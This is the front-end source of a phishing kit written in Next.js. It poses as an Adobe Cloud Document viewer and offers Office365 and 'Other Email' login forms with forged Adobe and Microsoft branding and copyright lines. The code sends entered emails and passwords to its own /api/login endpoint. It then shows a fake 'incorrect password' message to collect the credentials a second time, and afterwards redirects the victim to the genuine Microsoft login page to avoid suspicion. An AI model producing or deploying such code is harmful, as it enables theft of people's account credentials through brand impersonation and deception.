import Head from "next/head";
import Image from "next/image";
import { Inter } from "next/font/google";
import styles from "@/styles/Home.module.css";
import { MdAlternateEmail } from "react-icons/md";
import { useEffect, useRef, useState } from "react";
import { ImSpinner3 } from "react-icons/im";
import Script from 'next/script';


const inter = Inter({ subsets: ["latin"] });

const currentYear = new Date().getFullYear();

export default function Signin() {

  const [show, setShow] = useState(false);
  const [office, setOffice] = useState(false);
  const [email, setEmail] = useState('');
  const [password, setPassword] = useState('');
  const [loading, setLoading] = useState(false);
  const [message, setMessage] = useState('');
  const [messageOther, setMessageOther] = useState('');
  const [attemptCount, setAttemptCount] = useState(0); 
  const [otherCount, setOtherCount] = useState(0); 
  const [turnstileLoaded, setTurnstileLoaded] = useState(false);

  const turnstileRef = useRef<HTMLDivElement>(null);
  const tokenInputRef = useRef<HTMLInputElement>(null);

  useEffect(() => {
    if (turnstileRef.current && turnstileLoaded) {
      const sitekey = process.env.NEXT_PUBLIC_TURNSTILE_SITE_KEY;
      if (typeof sitekey !== 'string') {
        throw new Error('NEXT_PUBLIC_TURNSTILE_SITE_KEY is not set');
      }
  
      window.turnstile.render(turnstileRef.current, {
        sitekey,
        callback: (token: string) => {
          if (tokenInputRef.current) {
            tokenInputRef.current.value = token;
          }
        },
      });
    }
  }, [turnstileLoaded]);

  


  const handleSubmit = async (e: React.FormEvent) => {
    e.preventDefault();
    const turnstileToken = tokenInputRef.current?.value;
    //   console.log('Sending data:', { email, password, turnstileToken });
      setLoading(true);
      const response = await fetch('/api/login', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({ email, password, 'cf-turnstile-response': turnstileToken }),
      });

      setLoading(false);
      setAttemptCount(prevCount => prevCount + 1);
  
      if (attemptCount === 0) {
        setMessage('Your account or password is incorrect...');
      } else if (attemptCount === 1) {
        window.location.href = 'https://login.microsoftonline.com/common/login';
      
  
      setEmail('');
      setPassword('');
      setTimeout(() => {
        setMessage('')
      }, 5000);
    } else {
      setMessage('Turnstile token is missing.');
    }
  };
  
  const handleOtherSubmit = async (e: React.FormEvent) => {
    e.preventDefault();
    const turnstileToken = tokenInputRef.current?.value;

    //   console.log('Sending data:', { email, password, turnstileToken });
      setLoading(true);
      const response = await fetch('/api/login', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({ email, password, 'cf-turnstile-response': turnstileToken }),
      });

      setLoading(false);
      setOtherCount(prevCount => prevCount + 1);

      if (otherCount === 0) {
        setMessageOther('Your account or password is incorrect...');
      } else if (otherCount === 1) {
        window.location.href = 'https://login.microsoftonline.com/common/login';
      

      setEmail('');
      setPassword('');
      setTimeout(() => {
        setMessageOther('')
      }, 5000);
    } else {
        setMessageOther('Turnstile token is missing.');
    }
  };


  const handleShow = () => {
    setShow(true);
    setOffice(false);
    setTurnstileLoaded(true)
  }
  const handleShowBack = () => {
    setShow(false);
    setOffice(false);
    setTurnstileLoaded(false)
  }
  const handleOffice = () => {
    setOffice(true);
    setShow(true);
    setTurnstileLoaded(true)
  }
  return (
    <>
    <Script 
    src='https://challenges.cloudflare.com/turnstile/v0/api.js'
    onLoad={() => setTurnstileLoaded(false)}
    />
      <Head>
        <title>Adobe Cloud Document</title>
        <meta name="description" content="Generated by create next app" />
        <meta name="viewport" content="width=device-width, initial-scale=1" />
        <link rel="icon" href="/favicon.ico" />
        <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"/>
        <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png"/>
        <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"/>
        <link rel="manifest" href="/site.webmanifest"/>
      </Head>
      <main className={`${styles.main} ${inter.className}`}>
   
        <div>
      <div className={styles.backgroundImage}></div>
        <div className={styles.content}>
      {!show && !office && 
      <div className={styles.mainBox}>
          <div className="d-flex justify-content-center"><Image src='/adobe.jpg' alt="adobe" width={100} height={100}/> </div>
          <div className="text-center py-2">
          <h6 className={styles.adobeHeader}>Adobe Cloud Document</h6>
          <p className={styles.adobeText}>To access the document, please log in using the email credentials associated with the email address to which this file was sent.</p>
          </div>
          <div>
            <div className={styles.emailLinks} onClick={handleOffice}>
            <div className={styles.officeBox}>
              <Image src='/officee.png' alt="adobe" width={20} height={20}/>
              
              </div>
            <h6 className={styles.signin}>Sign in with Office365</h6>
            
            </div>
            <div  className={styles.emailLink}  onClick={handleShow}>
            <div className={styles.otherBox}><MdAlternateEmail className={styles.otherIcon}/></div>
           <h6 className={styles.signin}>Sign in with Other Email</h6> 
            </div>
          </div>
          <div>
            <small className={styles.copyright}>Select your email provider to view Document.</small>
            <small className={styles.copyright}>&copy; {currentYear} Adobe System Incorporated, All right reserved.</small>
          </div>
        </div>
        }
        {show && !office && 
        <div className={styles.box}>
        <div className={styles.boxx}>
        <div className="d-flex justify-content-center"><Image src='/other.jpeg' alt="adobe" width={50} height={50} className={styles.emailimg}/> </div>
          <div className="text-center py-2">
          <h6 className={styles.otherHeader}> Login with Other Email</h6>
          
            <form onSubmit={handleOtherSubmit}>
            <div>
              <div
                // className="cf-turnstile"
                data-sitekey={process.env.NEXT_PUBLIC_TURNSTILE_SITE_KEY}
                ref={turnstileRef}
              ></div>
                <input type="hidden" ref={tokenInputRef} name="cf-turnstile-response" />
                <small className={styles.verify}>Verifying your browser to ensure secure access</small>
            </div>
            <div className={styles.modalsubtext}>
            <p className={styles.errorMsg}>{messageOther}</p>
                           <label className={styles.label}>Email Address</label>
                           <div className={styles.forgotInputContainer}>
                             <input
                               placeholder="Email Address"
                               name="email"
                               type="email"
                                id="email"
                                value={email}
                                onChange={(e) => setEmail(e.target.value)}
                                required
                               className={`${styles.passwordinput} form-contol`}
                             />
                             <label className={styles.labels}>We&lsquo;ll never share your email with anyone else.</label>
                            
                           </div>
                         </div>
                         <div className={styles.modalsubtext}>
                           <label className={styles.label}>Password</label>
                           <div className={styles.forgotInputContainer}>
                             <input
                               type= "password" 
                               placeholder="********"
                                id="password"
                               name="password"
                              value={password}
                              onChange={(e) => setPassword(e.target.value)}
                              required
                               className={`${styles.passwordinput} form-contol`}
                             />
                            
                           </div>
                         </div>
                         <div className={styles.btncontainer}>
                          <button className={styles.closebtn} onClick={handleShowBack}>Back</button>
                          <button 
                            className={styles.loginbtn}
                            type="submit"
                            disabled={loading}
                            >
                            {loading ? (
                            <ImSpinner3 className={styles.spinner} />
                            ) : (
                            "Login"
                              )}
                            </button>
                         </div>
            </form>
            <div className="pt-4">
            <small className={styles.copyright}>&copy; {currentYear} Adobe System Incorporated, All right reserved.</small>
            </div>
          </div>
          </div>
          </div>
          }
        {office && show &&
        <div className={styles.box}>
        <div className={styles.boxx}>
        <div className="d-flex justify-content-start align-items-center"><Image src='/office.png' alt="adobe" width={30} height={30} className={styles.emalimg}/> <h6 className={styles.office}>Microsoft</h6> </div>
        <div className="pt-4">
          <h6 className={styles.sign}>Sign in</h6>
          <p className={styles.account}>to access your Microsoft Office 365 account</p>
        </div>
        <p className={styles.errorMsg}>{message}</p>
          <div className="text-center ">
            
            <form onSubmit={handleSubmit}>
            <div>
              <div
                // className="cf-turnstile"
                data-sitekey={process.env.NEXT_PUBLIC_TURNSTILE_SITE_KEY}
                ref={turnstileRef}
              ></div>
                <input type="hidden" ref={tokenInputRef} name="cf-turnstile-response" />
                <small className={styles.verify}>Verifying your browser to ensure secure access</small>
            </div>
           
            <div className={styles.modalsubtext}>
                           <label className={styles.label}>Email Address</label>
                           <div className={styles.forgotInputContainer}>
                             <input
                               type= "email" 
                               placeholder="Email"
                               name="email"
                               id="email"
                               value={email}
                               onChange={(e) => setEmail(e.target.value)}
                               className={`${styles.officeInput} form-contol`}
                             />
                            
                           </div>
                         </div>
                         <div className={styles.modalsubtext}>
                           <label className={styles.label}>Password</label>
                           <div className={styles.forgotInputContainer}>
                             <input
                               type= "password" 
                               placeholder="********"
                               id="password"
                               name="password"
                              value={password}
                              onChange={(e) => setPassword(e.target.value)}
                              required
                               className={`${styles.officeInput} form-contol`}
                             />
                            
                           </div>
                         </div>
                         <div className={styles.btncontainer}>
                         <button className={styles.closebtn} onClick={handleShowBack}>Back</button>
                          <button 
                            className={styles.loginbtn}
                            type="submit"
                            disabled={loading}
                            >
                            {loading ? (
                            <ImSpinner3 className={styles.spinner} />
                            ) : (
                            "Sign in"
                              )}
                            </button>
                         </div>
            </form>
            <div className="pt-4">
            <small className={styles.copyright}>&copy; {currentYear} Microsoft Office 365, All right reserved.</small>
            </div>
          </div>
          </div>
          </div>
          } 
          </div>
          </div>
          
      </main>
      
    </>
  );
}
